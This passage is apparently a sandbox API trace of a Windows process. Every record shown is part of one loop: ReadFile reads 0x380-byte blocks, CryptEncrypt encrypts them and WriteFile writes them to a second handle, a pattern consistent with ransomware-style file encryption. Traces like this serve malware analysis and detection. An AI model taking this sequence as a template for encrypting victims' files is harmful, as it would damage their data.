lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.048] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.048] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.048] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.048] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.048] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.048] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.048] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.048] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.048] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.048] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.048] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.048] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.048] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.049] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.049] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.049] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.049] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.049] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.049] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.049] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.049] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.050] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.050] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.050] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.050] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.050] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.050] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.050] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.050] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.050] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.050] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.050] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.050] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.050] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.050] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.051] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.051] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.051] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.051] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.051] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.051] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.051] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.051] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.051] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.051] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.051] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.051] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.051] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.051] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.052] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.052] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.052] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.052] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.052] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.052] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.052] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.052] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.052] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.052] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.052] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.052] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.052] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.052] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.053] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.053] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.053] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.053] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.053] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.053] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.053] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.053] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.053] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.053] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.053] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.053] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.053] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.053] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.054] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.054] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.054] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.054] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.054] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.054] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.054] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.054] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.054] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.054] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.054] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.054] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.055] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.055] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.055] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.055] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.055] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.055] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.055] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.055] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.055] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.055] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.055] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.055] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.055] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.055] CryptEncrypt (in: hKey=0x2fb108, 